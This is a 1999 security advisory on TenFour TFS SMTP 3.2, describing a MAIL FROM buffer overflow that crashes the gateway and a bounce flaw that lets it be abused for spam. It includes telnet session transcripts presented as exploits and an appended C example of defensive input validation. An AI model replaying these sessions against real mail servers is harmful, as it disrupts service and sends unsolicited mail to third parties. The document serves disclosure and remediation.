Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow
To: BUGTRAQ@SECURITYFOCUS.COM

INTRINsec Security Advisory

Release Date     : August 30, 1999
Software         : TenFour TFS SMTP 3.2
Operating System : Windows NT 3.x / 4.x
Impact           : Attackers can use a misconfigured TFS SMTP for spamming
                   and can remotely crash the TFS SMTP Gateway.
Author           : Christophe.Lesur@INTRINsec.com
Status           : TenFour has been advised of this.
URLs             : http://www.intrinsec.com/

__ Digest __

TenFour TFS SMTP Release 3.2 has two vulnerabilities: a buffer overflow and, under some circumstances and due to the inherent TFS architecture, it can be used for spamming. The direct results are that an attacker can remotely crash your TFS SMTP Gateway or send unsolicited mail to someone (and to the TFS ADMINISTRATOR).

TenFour has been advised of this. Thanks to Roberto Correnti for his support. (http://www.tenfour.com)

__ Technical Details and Exploits __

TenFour TFS SMTP Version 3.2 has two vulnerabilities: a buffer overflow and, under some circumstances, it can be used for spamming.

First: Buffer Overflow

There is a major buffer overflow in TFS SMTP 3.2. When you connect to the SMTP service on port 25, you get the TFS prompt. After sending the 'helo' command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP service with a nice protection fault. It is basically a buffer overflow, and it has been fixed in release 4.0.

This is the exploit:

[clesur@raptor clesur]$ telnet mailhost.victim.com 25
Trying 1.1.1.1...
Connected to mailhost.victim.com.
Escape character is '^]'.
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.victim.com, Hello
mail from:
Connection closed by foreign host.

Second: Spamming

The TFS SMTP engine accepts any mail by default and processes it in its kernel. In the case of a deficient message (wrong recipient, wrong domain...), TFS SMTP is usually configured to warn the sender and the TFS ADMINISTRATOR by sending a 4-line warning AND the full message.
Because there is no domain check before the message is handed to the TFS core, it is possible to spam someone and the TFS administrator.

This is the exploit:

[clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25
Trying 1.1.1.1...
Connected to mailhost.tfsvictim.com.
Escape character is '^]'.
220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.tfsvictim.com, Hello
mail from:
250 Sender OK
rcpt to:
250 Recipient OK
data
354 Begin data transfer. End with period.
from: target@victim.com
to: target@victim.com
.
250 Message accepted
quit
221 Connection closed
Connection closed by foreign host.

The spammed user will receive this message in their mailbox:

Message 22:
From target@victim.com Thu Jul 29 09:49:40 1999
Delivered-To: target@victim.com
From: target@victim.com
Date: Thu, 29 Jul 1999 11:44:03 +0200
Subject:
MIME-version: 1.0
Content-transfer-encoding: quoted-printable

####################################################
This message was not delivered to target@victim.com
TFS Admin was informed with a copy of this message
Sender was informed with a copy of this message
####################################################

__ Solutions __

For these vulnerabilities, TenFour suggests upgrading to a version greater than 4.0.

__ Contacts __

-- TenFour --

TenFour South Europe
ITFamily Sarl
Le Technoparc
15, rue Edouard Jeanneret
78306 Poissy Cedex
France
Tel: +33 1 39 22 65 15
Fax: +33 1 39 11 49 77
WWW: http://www.tenfour.fr

-- INTRINsec --

INTRINsec is a computer security company.
http://www.INTRINsec.com

This advisory is available in French on our site.

__ DISCLAIMERS __

INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDES THIS INFORMATION "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
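Both issues in the Technical Details section come down to checks a gateway should apply at the protocol layer, before a command reaches its core: bounding the length of the MAIL FROM argument instead of copying it into a fixed buffer, and refusing RCPT TO recipients whose domain the gateway does not serve instead of bouncing a copy to the sender and the administrator. The following C program is an added example written for this page; it is not TenFour's code and does not reproduce TFS SMTP internals. It assumes the 256-octet reverse-path limit from RFC 5321 section 4.5.3.1.3, reply codes chosen for the example (250, 501, 550), and a constructed configuration with tfsvictim.com as the only local domain.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Reverse-path limit from RFC 5321 section 4.5.3.1.3: 256 octets, brackets
 * included. A gateway that enforces it never needs a larger copy buffer. */
#define PATH_MAX_OCTETS 256

/* SMTP reply codes used by the handlers below (choice made for this example). */
enum { REPLY_OK = 250, REPLY_SYNTAX = 501, REPLY_RELAY_DENIED = 550 };

/* Constructed configuration: the only domain this gateway delivers for. */
const char *const LOCAL_DOMAINS[] = { "tfsvictim.com" };
#define N_LOCAL_DOMAINS 1

/* Case-insensitive comparison of n bytes, so "mail from:" matches "MAIL FROM:". */
static int equal_ci(const char *a, const char *b, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++) {
        if (a[i] == '\0' || b[i] == '\0' ||
            tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    }
    return 1;
}

/* Locates the "<...>" argument after a command verb; returns NULL on a syntax
 * error and stores the position of the closing bracket in *end. */
static const char *bracketed_arg(const char *line, const char *verb, const char **end)
{
    size_t vlen = strlen(verb);
    const char *arg;
    if (!equal_ci(line, verb, vlen))
        return NULL;
    arg = line + vlen;
    while (*arg == ' ')
        arg++;
    if (*arg != '<' || (*end = strchr(arg, '>')) == NULL)
        return NULL;
    return arg;
}

/* MAIL FROM handler: the argument is copied into the caller's buffer only
 * after its length is checked against the RFC limit and the buffer size. An
 * over-long sender gets a 501 reply instead of overrunning a fixed buffer,
 * which is the failure the advisory describes for TFS SMTP 3.2. */
int handle_mail_from(const char *line, char *path, size_t path_size)
{
    const char *end, *arg = bracketed_arg(line, "MAIL FROM:", &end);
    size_t len;
    if (arg == NULL)
        return REPLY_SYNTAX;
    len = (size_t)(end - arg) + 1;            /* both brackets included */
    if (len > PATH_MAX_OCTETS || len >= path_size)
        return REPLY_SYNTAX;
    memcpy(path, arg, len);
    path[len] = '\0';
    return REPLY_OK;
}

/* RCPT TO handler: the recipient's domain is compared with the configured
 * local domains before anything is handed to the mail core, so a message for
 * a foreign domain is refused here rather than bounced to third parties. */
int handle_rcpt_to(const char *line, const char *const *domains, size_t ndomains)
{
    const char *end, *at, *arg = bracketed_arg(line, "RCPT TO:", &end);
    size_t i, dlen;
    if (arg == NULL)
        return REPLY_SYNTAX;
    at = memchr(arg, '@', (size_t)(end - arg));
    if (at == NULL || at + 1 == end)
        return REPLY_SYNTAX;
    dlen = (size_t)(end - (at + 1));
    for (i = 0; i < ndomains; i++) {
        if (strlen(domains[i]) == dlen && equal_ci(domains[i], at + 1, dlen))
            return REPLY_OK;
    }
    return REPLY_RELAY_DENIED;
}

/* Builds "MAIL FROM:<AAA...>" with n A's (a constructed sender) and returns
 * the handler's reply, to exercise the length bound without a live server. */
int reply_for_sender_of_length(size_t n)
{
    char line[1024], path[PATH_MAX_OCTETS + 1];
    if (n + 13 > sizeof line)
        return -1;
    memcpy(line, "MAIL FROM:<", 11);
    memset(line + 11, 'A', n);
    line[11 + n] = '>';
    line[12 + n] = '\0';
    return handle_mail_from(line, path, sizeof path);
}

int main(void)
{
    printf("sender of 100 octets -> %d\n", reply_for_sender_of_length(100));
    printf("sender of 300 octets -> %d\n", reply_for_sender_of_length(300));
    printf("rcpt to target@victim.com -> %d\n",
           handle_rcpt_to("rcpt to: <target@victim.com>", LOCAL_DOMAINS, N_LOCAL_DOMAINS));
    printf("rcpt to user@tfsvictim.com -> %d\n",
           handle_rcpt_to("rcpt to: <user@tfsvictim.com>", LOCAL_DOMAINS, N_LOCAL_DOMAINS));
    return 0;
}
```

The two handlers share one rule: reject at the command stage and never let unvalidated input reach a fixed-size buffer or the delivery core. The recipient check is what turns the second issue from an open bounce generator into a plain "relaying denied" reply, and the length check means a 300-byte sender address costs the server one error reply rather than a protection fault.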
--
Christophe Lesur
Security Consultant
INTRINsec
mailto:christophe.lesur@INTRINsec.com